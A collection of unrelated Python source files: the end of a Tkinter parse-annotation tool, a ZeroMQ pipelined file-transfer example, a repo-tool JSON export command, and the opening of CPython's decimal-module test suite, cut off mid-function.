self.scrollable_tef_container.inner_frame.columnconfigure(0, weight=1)
self.token_editing_frame = TokenEditingFrame(self.scrollable_tef_container.inner_frame,
model, self._graph,
graph_change_callback=graph_change_callback)
self.token_editing_frame.grid(row=0, column=0, sticky='nwes')
self.category_readout = ReadoutFrame(self.category_frame, ['Category'])
self.category_readout.grid(row=0, column=0, sticky='nw')
self.category_readout.set('Category', self.category)
props_per_row = 5
top_row = {'statement', 'question', 'command', 'complete'}
self.properties = {}
for index, prop in enumerate(sorted(model.top_level_properties,
key=lambda p: (str(p) not in top_row, str(p)))):
variable = IntVar()
checkbox = Checkbutton(self.property_frame, text=str(prop), variable=variable,
command=self.on_property_change)
checkbox.property_name = prop
checkbox.variable = variable
checkbox.grid(row=index // props_per_row, column=index % props_per_row, sticky='nw')
self.properties[prop] = variable, checkbox
@property
def graph(self) -> BuildGraph:
return self._graph
@graph.setter
def graph(self, graph: BuildGraph) -> None:
self._graph = graph
for index in range(len(graph.tokens)):
props = (self.model.top_level_properties &
graph.get_phrase_category(index).positive_properties)
category = Category(self.model.default_restriction.name, props)
self.graph.set_phrase_category(index, category)
self.category = self.model.default_restriction
for index in sorted(graph.find_roots()):
self.category = graph.get_phrase_category(index)
for prop in self.properties:
has_prop = prop in self.category.positive_properties
self.properties[prop][0].set(has_prop)
self.token_editing_frame.destroy()
self.token_editing_frame = TokenEditingFrame(
self.scrollable_tef_container.inner_frame,
self.model, graph,
graph_change_callback=self.graph_change_callback
)
self.token_editing_frame.grid(row=0, column=0, sticky='nwes')
self.on_property_change()
def on_property_change(self):
self.refresh()
if self.graph_change_callback:
self.graph_change_callback()
def refresh(self):
self.token_editing_frame.refresh()
props = [prop for prop in self.properties if self.properties[prop][0].get()]
self.category = Category(self.model.default_restriction.name, props, ())
for index in range(len(self.graph.tokens)):
self.graph.set_phrase_category(index, self.category)
self.category_readout.set('Category', self.category)
class GraphVisualizationFrame(Frame):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._graph = BuildGraph() # type: Union[BuildGraph, ParseGraph]
self.photo_image = None
self.resize_condition = threading.Condition()
self.resize_request = True
self.resize_thread = threading.Thread(target=self._resize_thread, daemon=True)
self.rowconfigure(0, weight=1)
self.columnconfigure(0, weight=1)
self.vertical_scrollbar = Scrollbar(self, orient=VERTICAL)
self.vertical_scrollbar.grid(row=0, column=1, sticky='nse')
self.horizontal_scrollbar = Scrollbar(self, orient=HORIZONTAL)
self.horizontal_scrollbar.grid(row=1, column=0, sticky='wes')
self.canvas = Canvas(self, width=300, height=300,
xscrollcommand=self.horizontal_scrollbar.set,
yscrollcommand=self.vertical_scrollbar.set,
background='white')
self.canvas.grid(row=0, column=0, sticky='news')
self.vertical_scrollbar.config(command=self.canvas.yview)
self.horizontal_scrollbar.config(command=self.canvas.xview)
self.canvas.bind("<Configure>", self.resize_canvas)
self.resize_thread.start()
@property
def graph(self) -> Union[BuildGraph, ParseGraph]:
return self._graph
@graph.setter
def graph(self, graph: Union[BuildGraph, ParseGraph]):
self._graph = graph
self.refresh()
def refresh(self):
if not self._graph:
self.canvas.delete("IMG")
return
width = self.canvas.winfo_width()
height = self.canvas.winfo_height()
if width <= 0 or height <= 0:
return
height_pixels_per_mm = self.canvas.winfo_screenheight() / self.canvas.winfo_screenmmheight()
height_pixels_per_inch = height_pixels_per_mm * MM_PER_INCH
height_inches = (height / height_pixels_per_inch)
width_pixels_per_mm = self.canvas.winfo_screenwidth() / self.canvas.winfo_screenmmwidth()
width_pixels_per_inch = width_pixels_per_mm * MM_PER_INCH
width_inches = (width / width_pixels_per_inch)
gv_graph = Digraph()
gv_graph.graph_attr.update(size="%s,%s" % (width_inches / 2, height_inches / 2),
ratio="expand",
dpi=str(2 * max(height_pixels_per_inch, width_pixels_per_inch)))
self._graph.visualize(gv_graph)
image_data = gv_graph.pipe(format='png')
original = PIL.Image.open(BytesIO(image_data))
if width / height < original.width / original.height:
size = (width, int(width / original.width * original.height))
else:
size = (int(height / original.height * original.width), height)
if any(value <= 0 for value in size):
return
resized = original.resize(size, PIL.Image.ANTIALIAS)
self.photo_image = PhotoImage(resized)
self.canvas.delete("IMG")
self.canvas.create_image(0, 0, image=self.photo_image, anchor='nw', tags="IMG")
# noinspection PyUnusedLocal
def resize_canvas(self, event):
with self.resize_condition:
self.resize_request = True
self.resize_condition.notify()
def _resize_thread(self):
while True:
requested = False
with self.resize_condition:
if self.resize_request:
requested = True
self.resize_request = False
else:
self.resize_condition.wait()
if requested:
try:
self.refresh() # TODO: Why are we getting a runtime error?
except RuntimeError:
traceback.print_exc()
class AnnotationFrame(Frame):
def __init__(self, parent, model, settings, utterances: Sequence[str], on_accept, on_reject,
on_modify, *args, **kwargs):
super().__init__(parent, *args, **kwargs)
self.model = model
self.settings = settings
self._utterance_index = None
self._utterance = None
self._graph = BuildGraph()
self.utterances = utterances
self.on_accept = on_accept
self.on_reject = on_reject
self.on_modify = on_modify
# Frames
self.header_frame = Frame(self, relief='groove', borderwidth=1)
self.header_frame.grid(row=0, column=0, sticky='nwe')
self.middle_frame = Frame(self)
self.middle_frame.grid(row=1, column=0, sticky='news')
self.left_frame = Frame(self.middle_frame, relief='groove', borderwidth=1)
self.left_frame.grid(row=0, column=0, sticky='wnse')
self.right_frame = Frame(self.middle_frame, relief='groove', borderwidth=1)
self.right_frame.grid(row=0, column=1, sticky='ensw')
self.footer_frame = Frame(self, relief='groove', borderwidth=1)
self.footer_frame.grid(row=2, column=0, sticky='s')
self.columnconfigure(0, weight=1)
self.rowconfigure(1, weight=1)
self.header_frame.columnconfigure(0, weight=1)
self.middle_frame.rowconfigure(0, weight=1)
self.middle_frame.columnconfigure(0, weight=1)
self.middle_frame.columnconfigure(1, weight=10)
for frame in self.left_frame, self.right_frame:
frame.rowconfigure(0, weight=1)
frame.columnconfigure(0, weight=1)
# Header
self.readout_frame = ReadoutFrame(self.header_frame,
['Annotation Set', 'Utterance List', 'Utterance',
'Annotation'])
self.readout_frame.grid(row=0, column=0, sticky='we')
# Right
self.visualization_frame = GraphVisualizationFrame(self.right_frame)
self.visualization_frame.grid(row=0, column=0, sticky='news')
# Left
self.editing_frame = GraphEditingFrame(self.left_frame, model,
graph_change_callback=self.on_graph_change)
self.editing_frame.grid(row=0, column=0, sticky='news')
# Footer
self.first_button = Button(self.footer_frame, text='<<', state='disabled',
command=self.go_to_first)
self.first_button.grid(row=0, column=0, sticky='n')
self.previous_button = Button(self.footer_frame, text='<', state='disabled',
command=self.go_to_previous)
self.previous_button.grid(row=0, column=1, sticky='n')
self.reset_button = Button(self.footer_frame, text='Reset', state='disabled',
command=self.reset_graph)
self.reset_button.grid(row=0, column=2, sticky='n')
self.reject_button = Button(self.footer_frame, text='Reject', state='disabled',
command=self.reject)
self.reject_button.grid(row=0, column=3, sticky='n')
self.accept_button = Button(self.footer_frame, text='Accept', state='disabled',
command=self.accept)
self.accept_button.grid(row=0, column=4, sticky='n')
self.next_button = Button(self.footer_frame, text='>', state='disabled',
command=self.go_to_next)
self.next_button.grid(row=0, column=5, sticky='n')
self.last_button = Button(self.footer_frame, text='>>', state='disabled',
command=self.go_to_last)
self.last_button.grid(row=0, column=6, sticky='n')
self.go_to_first()
@property
def utterance(self) -> str:
return self._utterance
@utterance.setter
def utterance(self, utterance: str) -> None:
self._utterance = utterance
self.readout_frame.set('Utterance', utterance)
forests = Parser(self.model).parse(utterance,
timeout=time.time() + self.settings['timeout'])[0]
if forests and not forests[0].has_gaps():
graphs = tuple(forests[0].get_parse_graphs())
combined_graph = BuildGraph.from_parse_graphs(graphs)
else:
combined_graph = BuildGraph()
for spelling, _, _ in self.model.tokenizer.tokenize(utterance):
combined_graph.append_token(spelling)
for index in range(len(combined_graph.tokens)):
combined_graph.clear_token_category(index) # Not interested in these...
for index in combined_graph.find_roots():
category = combined_graph.get_phrase_category(index)
props = (self.model.default_restriction.positive_properties &
category.positive_properties)
revised_category = Category(self.model.default_restriction.name, props, ())
combined_graph.set_phrase_category(index, revised_category)
self._graph = combined_graph
self.editing_frame.graph = combined_graph
self.visualization_frame.graph = combined_graph
self.on_graph_change()
self.reset_button['state'] = 'normal'
@property
def graph(self) -> BuildGraph:
return self._graph
def reset_graph(self):
self.utterance = self.utterance
def go_to(self, index):
self._utterance_index = index
if self.utterances:
self.utterance = self.utterances[self._utterance_index]
back_enabled = self.utterances and self._utterance_index > 0
forward_enabled = self.utterances and self._utterance_index < len(self.utterances) - 1
self.first_button['state'] = 'normal' if back_enabled else 'disabled'
self.previous_button['state'] = 'normal' if back_enabled else 'disabled'
self.next_button['state'] = 'normal' if forward_enabled else 'disabled'
self.last_button['state'] = 'normal' if forward_enabled else 'disabled'
def go_to_first(self):
self.go_to(0)
def go_to_previous(self):
if self.utterances and self._utterance_index > 0:
self.go_to(self._utterance_index - 1)
def go_to_next(self):
if self.utterances and self._utterance_index < len(self.utterances) - 1:
self.go_to(self._utterance_index + 1)
def go_to_last(self):
if self.utterances:
self.go_to(len(self.utterances) - 1)
def accept(self):
if self.on_accept:
self.on_accept(self._utterance_index, self._utterance, self._graph,
self.readout_frame.get('Annotation'))
self.go_to_next()
def reject(self):
if self.on_reject:
self.on_reject(self._utterance_index, self._utterance, self._graph,
self.readout_frame.get('Annotation'))
self.go_to_next()
def on_graph_change(self):
self.editing_frame.refresh()
self.visualization_frame.refresh()
annotations = self.graph.get_annotations()
annotation_string = ('[%s]' % '] ['.join(annotations)) if annotations else ''
self.readout_frame.set('Annotation', annotation_string)
self.accept_button['state'] = ('normal' if self.on_accept and self._graph.is_tree()
else 'disabled')
self.reject_button['state'] = 'normal' if self.on_reject else 'disabled'
if self.on_modify:
self.on_modify(self._utterance_index, self._utterance, self._graph, annotation_string)
class AnnotatorApp(Tk):
def __init__(self, model, save_path, utterances, *args, **kwargs):
super().__init__(*args, **kwargs)
# self.wm_minsize(400, 400)
# self.size = (400, 400)
self.model = model
self.settings = {'timeout': 5}
self.utterances = list(utterances) if utterances else []
self.annotation_database = dbm.open(save_path, 'c')
self.protocol("WM_DELETE_WINDOW", self.close)
self.file_access_lock = threading.RLock()
self.rowconfigure(0, weight=1)
self.columnconfigure(0, weight=1)
# TODO: This is a kludge. We lie to the frame about having utterances until after we can
# grab the window size, below.
self.annotation_frame = AnnotationFrame(self, model, self.settings, [], self.accept,
self.reject, self.modify)
self.annotation_frame.grid(row=0, column=0, sticky='news')
self.text_box = Text(self, height=1)
self.text_box.grid(row=1, column=0, sticky='news')
self.text_box.bind('<Return>', self.submit)
self.text_box.focus_set()
# TODO: This feels kludgy. What's a better way?
# Capture the size of the window just after everything has been initialized, and set it to
# the minimum size.
threading.Timer(1, self._init_callback).start()
def close(self):
if self.annotation_database is not None:
self.annotation_database.close()
self.annotation_database = None
try:
self.destroy()
except TclError:
pass
def __del__(self):
self.close()
super().__del__()
def _init_callback(self):
self.wm_minsize(self.winfo_width(), self.winfo_height())
self.annotation_frame.utterances = self.utterances
self.annotation_frame.go_to_first()
# noinspection PyUnusedLocal
def submit(self, event):
text = self.text_box.get(1.0, END).strip()
self.text_box.delete(1.0, END)
if text:
self.utterances.append(text)
self.annotation_frame.go_to_last()
return 'break'
# noinspection PyUnusedLocal
def accept(self, utterance_index, utterance, graph, annotation):
result = {
'utterance': utterance,
'annotation': annotation,
'graph': graph.to_json(),
'status': 'accepted',
}
encoded_utterance = utterance.encode()
compressed_result = bz2.compress(json.dumps(result, sort_keys=True).encode())
with self.file_access_lock:
self.annotation_database[encoded_utterance] = compressed_result
# noinspection PyUnusedLocal
def reject(self, utterance_index, utterance, graph, annotation):
result = {
'utterance': utterance,
'annotation': annotation,
'graph': graph.to_json(),
'status': 'rejected',
}
encoded_utterance = utterance.encode()
compressed_result = bz2.compress(json.dumps(result, sort_keys=True).encode())
with self.file_access_lock:
self.annotation_database[encoded_utterance] = compressed_result
# noinspection PyUnusedLocal
def modify(self, utterance_index, utterance, graph, annotation):
result = {
'utterance': utterance,
'annotation': annotation,
'graph': graph.to_json()
}
encoded_utterance = utterance.encode()
with self.file_access_lock:
if encoded_utterance in self.annotation_database:
status = json.loads(
bz2.decompress(self.annotation_database[encoded_utterance]).decode()
).get('status')
else:
status = None
result['status'] = status
self.annotation_database[utterance.encode()] = \
bz2.compress(json.dumps(result, sort_keys=True).encode())
# TODO: Make the app support choosing a model instead of assuming English.
def main():
from pyramids_english.convenience import PARSER
model = PARSER.model
with open(r'/home/hosford42/PycharmProjects/NLU/Data/sentences.txt', encoding='utf-8') as file:
utterances = {line.strip() for line in file if line.strip()}
print("Loaded", len(utterances), "utterances...")
# TODO: We shouldn't have to prime the parser by calling it. Make an initialize() method, or do
# it in __init__.
PARSER.parse("hello") # Prime the parser to make sure categories and properties are all loaded.
app = AnnotatorApp(model, '~/PycharmProjects/NLU/Data/annotations.dbm',
utterances)
app.settings['timeout'] = 10
app.mainloop()
if __name__ == '__main__':
main()
|
fileio3.py
|
# File Transfer model #3
#
# In which the client requests each chunk individually, using
# command pipelining (a credit of up to PIPELINE outstanding requests)
# to give us credit-based flow control.
from __future__ import print_function
import os
from threading import Thread
import zmq
from zhelpers import socket_set_hwm, zpipe
CHUNK_SIZE = 250000
PIPELINE = 10
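# Note: server_thread below reads a local file named "testdata". A setup sketch in
# case it does not exist yet (the 25 MB size is an arbitrary choice for illustration):
#
#   with open("testdata", "wb") as f:
#       f.write(os.urandom(25 * 1000 * 1000))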
def client_thread(ctx, pipe):
dealer = ctx.socket(zmq.DEALER)
socket_set_hwm(dealer, PIPELINE)
dealer.connect("tcp://127.0.0.1:6000")
credit = PIPELINE # Up to PIPELINE chunks in transit
total = 0 # Total bytes received
chunks = 0 # Total chunks received
offset = 0 # Offset of next chunk request
while True:
while credit:
# ask for next chunk
dealer.send_multipart([
b"fetch",
b"%i" % offset,
b"%i" % CHUNK_SIZE,
])
offset += CHUNK_SIZE
credit -= 1
try:
chunk = dealer.recv()
except zmq.ZMQError as e:
if e.errno == zmq.ETERM:
return # shutting down, quit
else:
raise
chunks += 1
credit += 1
size = len(chunk)
total += size
if size < CHUNK_SIZE:
break # Last chunk received; exit
print ("%i chunks received, %i bytes" % (chunks, total))
pipe.send(b"OK")
# The rest of the code is exactly the same as in model 2, except
# that we set the HWM on the server's ROUTER socket to PIPELINE
# to act as a sanity check.
# .skip
def server_thread(ctx):
file = open("testdata", "rb")
router = ctx.socket(zmq.ROUTER)
socket_set_hwm(router, PIPELINE)
router.bind("tcp://*:6000")
while True:
# First frame in each message is the sender identity
# Second frame is "fetch" command
try:
msg = router.recv_multipart()
except zmq.ZMQError as e:
if e.errno == zmq.ETERM:
return # shutting down, quit
else:
raise
identity, command, offset_str, chunksz_str = msg
assert command == b"fetch"
offset = int(offset_str)
chunksz = int(chunksz_str)
# Read chunk of data from file
file.seek(offset, os.SEEK_SET)
data = file.read(chunksz)
# Send resulting chunk to client
router.send_multipart([identity, data])
# The main task is just the same as in the first model.
# .skip
def main():
# Start child threads
ctx = zmq.Context()
a,b = zpipe(ctx)
client = Thread(target=client_thread, args=(ctx, b))
server = Thread(target=server_thread, args=(ctx,))
client.start()
server.start()
# loop until client tells us it's done
try:
print (a.recv())
except KeyboardInterrupt:
pass
del a,b
ctx.term()
if __name__ == '__main__':
main()
|
dumpjson.py
|
#
# Copyright (C) 2008 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
from pyversion import is_python3
if is_python3():
import http.cookiejar as cookielib
import urllib.error
import urllib.parse
import urllib.request
import xmlrpc.client
else:
import imp
import urllib2
import urlparse
import xmlrpclib
urllib = imp.new_module('urllib')
urllib.error = urllib2
urllib.parse = urlparse
urllib.request = urllib2
xmlrpc = imp.new_module('xmlrpc')
xmlrpc.client = xmlrpclib
try:
import threading as _threading
except ImportError:
import dummy_threading as _threading
try:
import resource
def _rlimit_nofile():
return resource.getrlimit(resource.RLIMIT_NOFILE)
except ImportError:
def _rlimit_nofile():
return (256, 256)
try:
import multiprocessing
except ImportError:
multiprocessing = None
import sys
import json
from command import Command, MirrorSafeCommand
def _fetch_revs(p, sem):
with sem:
p.rev = p._LsRemote(p.revisionExpr).split('\t')[0]
class Dumpjson(Command, MirrorSafeCommand):
common = True
helpSummary = "Export json file with sources"
helpUsage = """
%prog [<project>...]
"""
helpDescription = """
"""
def Execute(self, opt, args):
all_projects = self.GetProjects(args, missing_ok=True, submodules_ok=False)
MAX_THREADS = 8
sem = _threading.Semaphore(MAX_THREADS)
threads = [ _threading.Thread(target=_fetch_revs, args=(p, sem)) for p in all_projects ]
for t in threads:
t.start()
for t in threads:
t.join()
data = {
p.name: {
"url": p.remote.url,
"relpath": p.relpath,
"groups": sorted(p.groups),
"revisionExpr": p.revisionExpr,
"rev": p.rev,
"linkfiles": [
{ "src_rel_to_dest": l.src_rel_to_dest,
"dest": l.dest,
}
for l in p.linkfiles
],
"copyfiles": [
{ "src": c.src,
"dest": c.dest,
}
for c in p.copyfiles
],
}
for p in all_projects
}
print(json.dumps(data, sort_keys=True))
|
test_decimal.py
|
# Copyright (c) 2004 Python Software Foundation.
# All rights reserved.
# Written by Eric Price <eprice at tjhsst.edu>
# and Facundo Batista <facundo at taniquetil.com.ar>
# and Raymond Hettinger <python at rcn.com>
# and Aahz (aahz at pobox.com)
# and Tim Peters
"""
These are the test cases for the Decimal module.
There are two groups of tests, Arithmetic and Behaviour. The former tests
the Decimal arithmetic using the tests provided by Mike Cowlishaw. The latter
tests the pythonic behaviour according to PEP 327.
Cowlishaw's tests can be downloaded from:
http://speleotrove.com/decimal/dectest.zip
This test module can be called from command line with one parameter (Arithmetic
or Behaviour) to test each part, or without parameter to test both parts. If
you're working through IDLE, you can import this test module and call test_main()
with the corresponding argument.
"""
import math
import os, sys
import operator
import warnings
import pickle, copy
import unittest
import numbers
import locale
from test.support import (run_unittest, run_doctest, is_resource_enabled,
requires_IEEE_754, requires_docstrings,
requires_legacy_unicode_capi)
from test.support import (TestFailed,
run_with_locale, cpython_only,
darwin_malloc_err_warning)
from test.support.import_helper import import_fresh_module
from test.support import warnings_helper
import random
import inspect
import threading
import sysconfig
_cflags = sysconfig.get_config_var('CFLAGS') or ''
_config_args = sysconfig.get_config_var('CONFIG_ARGS') or ''
MEMORY_SANITIZER = (
'-fsanitize=memory' in _cflags or
'--with-memory-sanitizer' in _config_args
)
ADDRESS_SANITIZER = (
'-fsanitize=address' in _cflags
)
if sys.platform == 'darwin':
darwin_malloc_err_warning('test_decimal')
C = import_fresh_module('decimal', fresh=['_decimal'])
P = import_fresh_module('decimal', blocked=['_decimal'])
import decimal as orig_sys_decimal
# fractions module must import the correct decimal module.
cfractions = import_fresh_module('fractions', fresh=['fractions'])
sys.modules['decimal'] = P
pfractions = import_fresh_module('fractions', fresh=['fractions'])
sys.modules['decimal'] = C
fractions = {C:cfractions, P:pfractions}
sys.modules['decimal'] = orig_sys_decimal
# Useful Test Constant
Signals = {
C: tuple(C.getcontext().flags.keys()) if C else None,
P: tuple(P.getcontext().flags.keys())
}
# Signals ordered with respect to precedence: when an operation
# produces multiple signals, signals occurring later in the list
# should be handled before those occurring earlier in the list.
OrderedSignals = {
C: [C.Clamped, C.Rounded, C.Inexact, C.Subnormal, C.Underflow,
C.Overflow, C.DivisionByZero, C.InvalidOperation,
C.FloatOperation] if C else None,
P: [P.Clamped, P.Rounded, P.Inexact, P.Subnormal, P.Underflow,
P.Overflow, P.DivisionByZero, P.InvalidOperation,
P.FloatOperation]
}
def assert_signals(cls, context, attr, expected):
d = getattr(context, attr)
cls.assertTrue(all(d[s] if s in expected else not d[s] for s in d))
ROUND_UP = P.ROUND_UP
ROUND_DOWN = P.ROUND_DOWN
ROUND_CEILING = P.ROUND_CEILING
ROUND_FLOOR = P.ROUND_FLOOR
ROUND_HALF_UP = P.ROUND_HALF_UP
ROUND_HALF_DOWN = P.ROUND_HALF_DOWN
ROUND_HALF_EVEN = P.ROUND_HALF_EVEN
ROUND_05UP = P.ROUND_05UP
RoundingModes = [
ROUND_UP, ROUND_DOWN, ROUND_CEILING, ROUND_FLOOR,
ROUND_HALF_UP, ROUND_HALF_DOWN, ROUND_HALF_EVEN,
ROUND_05UP
]
# Tests are built around these assumed context defaults.
# test_main() restores the original context.
ORIGINAL_CONTEXT = {
C: C.getcontext().copy() if C else None,
P: P.getcontext().copy()
}
def init(m):
if not m: return
DefaultTestContext = m.Context(
prec=9, rounding=ROUND_HALF_EVEN, traps=dict.fromkeys(Signals[m], 0)
)
m.setcontext(DefaultTestContext)
TESTDATADIR = 'decimaltestdata'
if __name__ == '__main__':
file = sys.argv[0]
else:
file = __file__
testdir = os.path.dirname(file) or os.curdir
directory = testdir + os.sep + TESTDATADIR + os.sep
skip_expected = not os.path.isdir(directory)
# Make sure it actually raises errors when not expected and caught in flags
# Slower, since it runs some things several times.
EXTENDEDERRORTEST = False
# Test extra functionality in the C version (-DEXTRA_FUNCTIONALITY).
EXTRA_FUNCTIONALITY = True if hasattr(C, 'DecClamped') else False
requires_extra_functionality = unittest.skipUnless(
EXTRA_FUNCTIONALITY, "test requires build with -DEXTRA_FUNCTIONALITY")
skip_if_extra_functionality = unittest.skipIf(
EXTRA_FUNCTIONALITY, "test requires regular build")
class IBMTestCases(unittest.TestCase):
"""Class which tests the Decimal class against the IBM test cases."""
def setUp(self):
self.context = self.decimal.Context()
self.readcontext = self.decimal.Context()
self.ignore_list = ['#']
# List of individual .decTest test ids that correspond to tests that
# we're skipping for one reason or another.
self.skipped_test_ids = set([
# Skip implementation-specific scaleb tests.
'scbx164',
'scbx165',
# For some operations (currently exp, ln, log10, power), the decNumber
# reference implementation imposes additional restrictions on the context
# and operands. These restrictions are not part of the specification;
# however, the effect of these restrictions does show up in some of the
# testcases. We skip testcases that violate these restrictions, since
# Decimal behaves differently from decNumber for these testcases so these
# testcases would otherwise fail.
'expx901',
'expx902',
'expx903',
'expx905',
'lnx901',
'lnx902',
'lnx903',
'lnx905',
'logx901',
'logx902',
'logx903',
'logx905',
'powx1183',
'powx1184',
'powx4001',
'powx4002',
'powx4003',
'powx4005',
'powx4008',
'powx4010',
'powx4012',
'powx4014',
])
if self.decimal == C:
# status has additional Subnormal, Underflow
self.skipped_test_ids.add('pwsx803')
self.skipped_test_ids.add('pwsx805')
# Correct rounding (skipped for decNumber, too)
self.skipped_test_ids.add('powx4302')
self.skipped_test_ids.add('powx4303')
self.skipped_test_ids.add('powx4342')
self.skipped_test_ids.add('powx4343')
# http://bugs.python.org/issue7049
self.skipped_test_ids.add('pwmx325')
self.skipped_test_ids.add('pwmx326')
# Map test directives to setter functions.
self.ChangeDict = {'precision' : self.change_precision,
'rounding' : self.change_rounding_method,
'maxexponent' : self.change_max_exponent,
'minexponent' : self.change_min_exponent,
'clamp' : self.change_clamp}
# Name adapter to be able to change the Decimal and Context
# interface without changing the test files from Cowlishaw.
self.NameAdapter = {'and':'logical_and',
'apply':'_apply',
'class':'number_class',
'comparesig':'compare_signal',
'comparetotal':'compare_total',
'comparetotmag':'compare_total_mag',
'copy':'copy_decimal',
'copyabs':'copy_abs',
'copynegate':'copy_negate',
'copysign':'copy_sign',
'divideint':'divide_int',
'invert':'logical_invert',
'iscanonical':'is_canonical',
'isfinite':'is_finite',
'isinfinite':'is_infinite',
'isnan':'is_nan',
'isnormal':'is_normal',
'isqnan':'is_qnan',
'issigned':'is_signed',
'issnan':'is_snan',
'issubnormal':'is_subnormal',
'iszero':'is_zero',
'maxmag':'max_mag',
'minmag':'min_mag',
'nextminus':'next_minus',
'nextplus':'next_plus',
'nexttoward':'next_toward',
'or':'logical_or',
'reduce':'normalize',
'remaindernear':'remainder_near',
'samequantum':'same_quantum',
'squareroot':'sqrt',
'toeng':'to_eng_string',
'tointegral':'to_integral_value',
'tointegralx':'to_integral_exact',
'tosci':'to_sci_string',
'xor':'logical_xor'}
# Map test-case names to roundings.
self.RoundingDict = {'ceiling' : ROUND_CEILING,
'down' : ROUND_DOWN,
'floor' : ROUND_FLOOR,
'half_down' : ROUND_HALF_DOWN,
'half_even' : ROUND_HALF_EVEN,
'half_up' : ROUND_HALF_UP,
'up' : ROUND_UP,
'05up' : ROUND_05UP}
# Map the test cases' error names to the actual errors.
self.ErrorNames = {'clamped' : self.decimal.Clamped,
'conversion_syntax' : self.decimal.InvalidOperation,
'division_by_zero' : self.decimal.DivisionByZero,
'division_impossible' : self.decimal.InvalidOperation,
'division_undefined' : self.decimal.InvalidOperation,
'inexact' : self.decimal.Inexact,
'invalid_context' : self.decimal.InvalidOperation,
'invalid_operation' : self.decimal.InvalidOperation,
'overflow' : self.decimal.Overflow,
'rounded' : self.decimal.Rounded,
'subnormal' : self.decimal.Subnormal,
'underflow' : self.decimal.Underflow}
# The following functions return True/False rather than a
# Decimal instance.
self.LogicalFunctions = ('is_canonical',
'is_finite',
'is_infinite',
'is_nan',
'is_normal',
'is_qnan',
'is_signed',
'is_snan',
'is_subnormal',
'is_zero',
'same_quantum')
def read_unlimited(self, v, context):
"""Work around the limitations of the 32-bit _decimal version. The
guaranteed maximum values for prec, Emax etc. are 425000000,
but higher values usually work, except for rare corner cases.
In particular, all of the IBM tests pass with maximum values
of 1070000000."""
if self.decimal == C and self.decimal.MAX_EMAX == 425000000:
self.readcontext._unsafe_setprec(1070000000)
self.readcontext._unsafe_setemax(1070000000)
self.readcontext._unsafe_setemin(-1070000000)
return self.readcontext.create_decimal(v)
else:
return self.decimal.Decimal(v, context)
def eval_file(self, file):
global skip_expected
if skip_expected:
raise unittest.SkipTest
with open(file, encoding="utf-8") as f:
for line in f:
line = line.replace('\r\n', '').replace('\n', '')
#print line
try:
t = self.eval_line(line)
except self.decimal.DecimalException as exception:
#Exception raised where there shouldn't have been one.
self.fail('Exception "'+exception.__class__.__name__ + '" raised on line '+line)
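    # The .decTest files mix directive lines ("precision: 9", "rounding: half_up",
    # ...) with test lines of the form
    #     <id> <operation> <operands...> -> <result> [<conditions...>]
    # e.g. (illustrative)  addx001 add 1 1 -> 2
    # eval_line() dispatches to eval_directive() or eval_equation() accordingly.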
def eval_line(self, s):
if s.find(' -> ') >= 0 and s[:2] != '--' and not s.startswith(' --'):
s = (s.split('->')[0] + '->' +
s.split('->')[1].split('--')[0]).strip()
else:
s = s.split('--')[0].strip()
for ignore in self.ignore_list:
if s.find(ignore) >= 0:
#print s.split()[0], 'NotImplemented--', ignore
return
if not s:
return
elif ':' in s:
return self.eval_directive(s)
else:
return self.eval_equation(s)
def eval_directive(self, s):
funct, value = (x.strip().lower() for x in s.split(':'))
if funct == 'rounding':
value = self.RoundingDict[value]
else:
try:
value = int(value)
except ValueError:
pass
funct = self.ChangeDict.get(funct, (lambda *args: None))
funct(value)
def eval_equation(self, s):
if not TEST_ALL and random.random() < 0.90:
return
self.context.clear_flags()
try:
Sides = s.split('->')
L = Sides[0].strip().split()
id = L[0]
if DEBUG:
print("Test ", id, end=" ")
funct = L[1].lower()
valstemp = L[2:]
L = Sides[1].strip().split()
ans = L[0]
exceptions = L[1:]
except (TypeError, AttributeError, IndexError):
raise self.decimal.InvalidOperation
def FixQuotes(val):
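            # In the test data, doubled quotes stand for literal quote
            # characters while single quotes merely delimit an operand,
            # e.g. (illustrative)  FixQuotes("'ab''cd'") == "ab'cd"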
val = val.replace("''", 'SingleQuote').replace('""', 'DoubleQuote')
val = val.replace("'", '').replace('"', '')
val = val.replace('SingleQuote', "'").replace('DoubleQuote', '"')
return val
if id in self.skipped_test_ids:
return
fname = self.NameAdapter.get(funct, funct)
if fname == 'rescale':
return
funct = getattr(self.context, fname)
vals = []
conglomerate = ''
quote = 0
theirexceptions = [self.ErrorNames[x.lower()] for x in exceptions]
for exception in Signals[self.decimal]:
self.context.traps[exception] = 1 #Catch these bugs...
for exception in theirexceptions:
self.context.traps[exception] = 0
for i, val in enumerate(valstemp):
if val.count("'") % 2 == 1:
quote = 1 - quote
if quote:
conglomerate = conglomerate + ' ' + val
continue
else:
val = conglomerate + val
conglomerate = ''
v = FixQuotes(val)
if fname in ('to_sci_string', 'to_eng_string'):
if EXTENDEDERRORTEST:
for error in theirexceptions:
self.context.traps[error] = 1
try:
funct(self.context.create_decimal(v))
except error:
pass
except Signals[self.decimal] as e:
self.fail("Raised %s in %s when %s disabled" % \
(e, s, error))
else:
self.fail("Did not raise %s in %s" % (error, s))
self.context.traps[error] = 0
v = self.context.create_decimal(v)
else:
v = self.read_unlimited(v, self.context)
vals.append(v)
ans = FixQuotes(ans)
if EXTENDEDERRORTEST and fname not in ('to_sci_string', 'to_eng_string'):
for error in theirexceptions:
self.context.traps[error] = 1
try:
funct(*vals)
except error:
pass
except Signals[self.decimal] as e:
self.fail("Raised %s in %s when %s disabled" % \
(e, s, error))
else:
self.fail("Did not raise %s in %s" % (error, s))
self.context.traps[error] = 0
# as above, but add traps cumulatively, to check precedence
ordered_errors = [e for e in OrderedSignals[self.decimal] if e in theirexceptions]
for error in ordered_errors:
self.context.traps[error] = 1
try:
funct(*vals)
except error:
pass
except Signals[self.decimal] as e:
self.fail("Raised %s in %s; expected %s" %
(type(e), s, error))
else:
self.fail("Did not raise %s in %s" % (error, s))
# reset traps
for error in ordered_errors:
self.context.traps[error] = 0
if DEBUG:
print("--", self.context)
try:
result = str(funct(*vals))
if fname in self.LogicalFunctions:
result = str(int(eval(result))) # 'True', 'False' -> '1', '0'
except Signals[self.decimal] as error:
self.fail("Raised %s in %s" % (error, s))
